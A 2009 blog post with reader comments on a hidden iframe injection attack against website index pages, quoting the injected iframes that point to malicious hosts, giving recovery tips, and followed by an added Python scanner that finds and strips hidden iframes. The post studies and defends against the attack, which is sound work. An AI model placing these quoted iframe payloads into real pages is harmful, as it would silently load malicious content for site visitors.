According to the survey, one in 10 websites on the same server is affected by the hidden iframe injection. The primary targets are the index.* pages on the server, which get loaded with hidden iframe code. Dangerous!
The following snippet is added to HTML pages:
<iframe src="http://yahoowhois.biz/?click=8F9DA" width=1 height=193 style="visibility:hidden;position:absolute"></iframe>
And the following to PHP pages:
<iframe src="http://compoundcapitolgroup.cn:8080/ts/in.cgi?pepsi47" width=125 height=125 style="visibility: hidden"></iframe>
<iframe src="http://hugetoplocate.cn:8080/index.php" width=194 height=193 style="visibility: hidden"></iframe>
How is it possible for the worm to inject the hidden iframes into our files?
The reason is simple. The worm is already present on one of the PCs/workstations that you use for accessing the FTP / DB / control panel of your web hosting server.
When the worm is present on one of your PCs, it silently reads the credentials (username and password) you type for the FTP / DB / control panel, accesses your account (FTP, for example) and infects the files on the server. It adds the above-mentioned code to all index.* files.
How to recover from a hidden iframe injection attack?
Here are a few tips that might help you:
1. The first thing is to change the passwords of your FTP, Database, and Control panel.
2. Set the file permissions on your server to a secure mode (e.g. restrict access for any anonymous or Internet user). You need to contact your hosting company for this task.
3. Download your web files from the server and check them for infections. Clean the infected files. (Please contact your programmers/developers for this task.)
4. Scan and clean the PCs/workstations that you use for logging into your web hosting server.
5. Please avoid using public/shared computers to access your server.
How do I clean the infected files?
# Search for all pages containing the malicious code and replace it with a space.
# Write a script to automate this process.
I found a script on a website that can be downloaded from here. Save it as clean.php and upload it to the respective root folder of your website.
Then open this URL in your browser: http://www.yourdomain.com/clean.php?s=index.php&c=iframe
I read in one of the forums that the 's' parameter specifies the file name to search for and the 'c' parameter specifies the text to search for inside the file/root. The results will be something like this:
It will list all the index.* pages, and if the string is found, it will be displayed as above to help you find and remove it from the actual script.
P.S. The best advice is to remove the iframes manually from the script, even if you had planned to do it automatically.
Mr.H
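A local scanner for the "download your files and check for infections" step and the cleanup described above, added here as an example (it is not the clean.php script the post links to). It reports hidden iframes in index.* files of a downloaded site copy and removes them only when asked, keeping a .bak backup; the function names and the injected.example sample page are constructed for illustration.

```python
import re
import shutil
import tempfile
from pathlib import Path

# A complete iframe element (group 1 = its attributes), the hiding styles seen above, its src.
IFRAME_RE = re.compile(rb"<iframe\b([^>]*)>\s*</iframe\s*>", re.I | re.S)
HIDDEN_RE = re.compile(rb"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
SRC_RE = re.compile(rb"src\s*=\s*[\"']?([^\s\"'>]+)", re.I)

def find_hidden_iframes(data):
    """Return (line_number, src, markup) for each hidden iframe in raw bytes."""
    hits = []
    for m in IFRAME_RE.finditer(data):
        if HIDDEN_RE.search(m.group(1)):
            src = SRC_RE.search(m.group(1))
            line = data.count(b"\n", 0, m.start()) + 1
            hits.append((line, src.group(1).decode("latin-1") if src else "", m.group(0)))
    return hits

def scan_tree(root, pattern="index.*"):
    """Map each index.* file under root (backups skipped) to its findings."""
    report = {}
    for path in sorted(Path(root).rglob(pattern)):
        if path.is_file() and path.suffix != ".bak":
            hits = find_hidden_iframes(path.read_bytes())
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

def clean_file(path):
    """Remove hidden iframes from one file, keeping a .bak copy; return count."""
    path = Path(path)
    data = path.read_bytes()
    hits = find_hidden_iframes(data)
    if hits:
        shutil.copy2(path, path.with_name(path.name + ".bak"))
        path.write_bytes(IFRAME_RE.sub(lambda m: b"" if HIDDEN_RE.search(m.group(1)) else m.group(0), data))
    return len(hits)

def demo():
    """Scan, clean and rescan a constructed sample page in a temp directory."""
    root = Path(tempfile.mkdtemp())
    bad = b'<iframe src="http://injected.example/in.cgi" width=1 height=1 style="visibility: hidden"></iframe>'
    ok = b'<iframe src="/map" width=300 height=200></iframe>'
    (root / "index.html").write_bytes(b"<html>\n" + ok + b"\n" + bad + b"\n</html>\n")
    before = scan_tree(root)
    removed = clean_file(root / "index.html")
    return before, removed, scan_tree(root), (root / "index.html").read_bytes()
```

Run scan_tree first and review the reported line numbers and src values; files are read and written as bytes, so cleaning changes nothing except the removed markup.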

June 6th, 2009 at 3:31 PM
How can I prevent my site from this attack?
June 12th, 2009 at 4:50 PM
The best information I have found, exactly here. Keep going. Thank you.
June 19th, 2009 at 7:08 AM
How can we stop this thing?
June 19th, 2009 at 7:09 AM
How to solve this issue.
It's a nightmare to every Developer
June 19th, 2009 at 8:46 AM
You've got to clean your PC/Workstation/Network of viruses. When you have an infected PC it is always possible to catch up your website (via FTP). Don't leave the FTP client with a saved password (FTP). If you need additional assistance, mail me directly: hasan@racingthirst.com
June 30th, 2009 at 8:51 PM
I don’t think it’s an issue with the FTP clients. Hackers are able to find a hole in the server which they have used to inject iframe codes via shell script. I have been affected by one and went through the access log and found that hackers used some parameters which run a php file with shell_exec commands written on it. If it gets run, it affects all the file system.
July 1st, 2009 at 3:33 PM
It is not only FTP & FTP clients (I never concluded). But it is also an important thing. However, you are talking about the script injection.
July 28th, 2009 at 4:07 AM
I wanted to ask, is there any chance for a modified version of the directory listing script, with an iphone-stylish like design?
July 29th, 2009 at 12:57 AM
Very interesting post! Thank you for such an interesting resource! PS: Sorry for my bad English, I've just started to learn this language
http://www.racingthirst.com – cool!!!!
November 23rd, 2009 at 6:18 PM
Approx. 2.5 hrs.